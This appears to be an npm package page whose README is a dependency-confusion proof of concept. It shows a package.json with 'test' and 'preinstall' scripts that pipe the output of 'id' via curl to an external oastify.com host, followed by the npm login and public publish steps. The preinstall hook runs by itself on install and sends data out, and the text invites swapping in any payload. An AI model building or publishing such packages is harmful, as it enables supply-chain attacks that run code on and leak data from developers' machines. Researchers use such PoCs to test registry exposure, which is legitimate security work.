2.0.0 • Published 2 months ago
datamodel.core.dm v2.0.0
NPM Dependency Confusion PoC
Creation of a package called 'yourpackage'.
Insert the payload you want to run in package.json
"scripts": {
"test": "id | curl -X POST -d @- https://xxx.oastify.com/poc",
"preinstall": "id | curl -X POST -d @- https://xxx.oastify.com/poc"
},
Login on NPM
» npm login
npm notice Log in on https://registry.npmjs.org/
Username: username
Password:
Email: (this IS public) foo.bar@foobar.com
npm notice Please use the one-time password (OTP) from your authenticator application
Enter one-time password: XXXXXX
Logged in as username on https://registry.npmjs.org/
Publish package
» npm publish --access public
npm notice
...
npm notice Publishing to https://registry.npmjs.org/
This operation requires a one-time password.
Enter OTP: XXXXXX
+ yourpackage@1.0.0